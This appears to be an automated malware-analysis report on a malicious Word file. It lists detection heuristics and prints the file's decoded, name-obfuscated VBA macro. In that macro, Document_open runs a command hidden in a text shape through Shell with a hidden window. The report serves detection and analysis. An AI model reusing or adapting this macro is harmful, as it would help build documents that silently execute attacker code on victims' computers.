Verdict: MALICIOUS
Risk Score: 232
Heuristics: 8

- ClamAV: Doc.Malware.Generic-6923174-0 (severity: critical, rule CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Generic-6923174-0.
- VBA macros detected (severity: medium, rule OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- Potential Shell call in VBA (severity: critical, rule OLE_VBA_SHELL). Matched line in script, with surrounding context:

      End If
      tjpWcPJpbl = Shell(AtDwj + tQiaufw + qVzCiDW, oTRqZosCOY)
      If (KbzIEiPk <> 0 Or miadCj) Then

- VBA p-code auto-exec with execution tokens (severity: high, rule OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (severity: low, rule OLE_VBA_DOCOPEN). Matched line in script, with surrounding context:

      End Function
      Private Sub Document_open()
      If (AwatEnMFW <> 0 Or uEPPi) Then

- Reference to PowerShell (severity: high, rule SC_STR_POWERSHELL).
- Suspicious extracted artifact (severity: info, rule EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (severity: info, rule EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4437 bytes |

SHA-256: 6d0380f7561769cd4a37e6545d4d9efa6cbcb7e7888e080d232662039705cd93

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 43 of 82 identifiers look randomly generated (e.g. 'oTRqZosCOY'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "clHiZVOci"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cbGiXTqN()
Const oTRqZosCOY = 5070366 - 5070366
If (HYLQF <> 0 Or tFjhDzhWM) Then
tFjhDzhWM = True
IGHzi = IGHzi & CDbl(HYLQF)
If (HYLQF = 1) Then
IGHzi = IGHzi & "paizOL"
Else
IGHzi = IGHzi & "QXCYhzAo"
End If
End If
AtDwj = Shapes(1).TextFrame.ContainingRange
If (VtpRzP <> 0 Or zPzYLs) Then
zPzYLs = True
YujklGjh = YujklGjh & CByte(VtpRzP)
If (VtpRzP = 1) Then
YujklGjh = YujklGjh & "PKAZAW"
Else
YujklGjh = YujklGjh & "TCuqik"
End If
End If
If (bPlOwos <> 0 Or KnIFQE) Then
KnIFQE = True
GhobaH = GhobaH & Atn(bPlOwos)
If (bPlOwos = 1) Then
GhobaH = GhobaH & "pNcDjVQCG"
Else
GhobaH = GhobaH & "WKIWVUkd"
End If
End If
If (qlrRvOinI <> 0 Or JwQdZXlt) Then
JwQdZXlt = True
XvHhV = XvHhV & CByte(qlrRvOinI)
If (qlrRvOinI = 1) Then
XvHhV = XvHhV & "FvzlNEzD"
Else
XvHhV = XvHhV & "IEWLH"
End If
End If
tjpWcPJpbl = Shell(AtDwj + tQiaufw + qVzCiDW, oTRqZosCOY)
If (KbzIEiPk <> 0 Or miadCj) Then
miadCj = True
RYiqAv = RYiqAv & CByte(KbzIEiPk)
If (KbzIEiPk = 1) Then
RYiqAv = RYiqAv & "AzUsjr"
Else
RYiqAv = RYiqAv & "lYbZFZ"
End If
End If
If (IwoWFOV <> 0 Or owRKf) Then
owRKf = True
jqlPH = jqlPH & CDbl(IwoWFOV)
If (IwoWFOV = 1) Then
jqlPH = jqlPH & "KkmftCAFw"
Else
jqlPH = jqlPH & "wKbvP"
End If
End If
If (SlCvlLtH <> 0 Or UAamqkR) Then
UAamqkR = True
RrILQB = RrILQB & CInt(SlCvlLtH)
If (SlCvlLtH = 1) Then
RrILQB = RrILQB & "iNcDGZBA"
Else
RrILQB = RrILQB & "SwBazfS"
End If
End If
If (ipEiv <> 0 Or vRjlipln) Then
vRjlipln = True
RrLXMIcDO = RrLXMIcDO & CByte(ipEiv)
If (ipEiv = 1) Then
RrLXMIcDO = RrLXMIcDO & "DjAHjk"
Else
RrLXMIcDO = RrLXMIcDO & "wnHZCTOFq"
End If
End If
End Function
Private Sub Document_open()
If (AwatEnMFW <> 0 Or uEPPi) Then
uEPPi = True
OkpdMma = OkpdMma & Atn(AwatEnMFW)
If (AwatEnMFW = 1) Then
OkpdMma = OkpdMma & "AmzwN"
Else
OkpdMma = OkpdMma & "cBuzB"
End If
End If
If (EbcCRa <> 0 Or bpAXJ) Then
bpAXJ = True
biFlmNX = biFlmNX & CDbl(EbcCRa)
If (EbcCRa = 1) Then
biFlmNX = biFlmNX & "sSoNsUh"
Else
biFlmNX = biFlmNX & "JSNtJKIMa"
End If
End If
If (WQMQFs <> 0 Or jsYuCmqN) Then
jsYuCmqN = True
vvJzBnqwj = vvJzBnqwj & Atn(WQMQFs)
If (WQMQFs = 1) Then
vvJzBnqwj = vvJzBnqwj & "OXzSWt"
Else
vvJzBnqwj = vvJzBnqwj & "msAqTu"
End If
End If
If (SaLlbo <> 0 Or ZtwIKoRr) Then
ZtwIKoRr = True
IooZGb = IooZGb & CByte(SaLlbo)
If (SaLlbo = 1) Then
IooZGb = IooZGb & "fiJQRRat"
Else
IooZGb = IooZGb & "rBFwhh"
End If
End If
cbGiXTqN
If (miaknATa <> 0 Or YVvOGBd) Then
YVvOGBd = True
AlmTtDomQ = AlmTtDomQ & CDbl(miaknATa)
If (miaknATa = 1) Then
AlmTtDomQ = AlmTtDomQ & "UYuWCtC"
Else
AlmTtDomQ = AlmTtDomQ & "BcilU"
End If
End If
If (hYzqwncwi <> 0 Or hZUsam) Then
hZUsam = True
WcwBbCSCL = WcwBbCSCL & CByte(hYzqwncwi)
If (hYzqwncwi = 1) Then
WcwBbCSCL = WcwBbCSCL & "AALOR"
Else
WcwBbCSCL = WcwBbCSCL & "ZMirvTksa"
End If
End If
If (unwBH <> 0 Or cRwzXmW) Then
cRwzXmW = True
qrfDS = qrfDS & CInt(unwBH)
If (unwBH = 1) Then
qrfDS = qrfDS & "UITDzSm"
Else
qrfDS = qrfDS & "tibcPT"
End If
End If
End Sub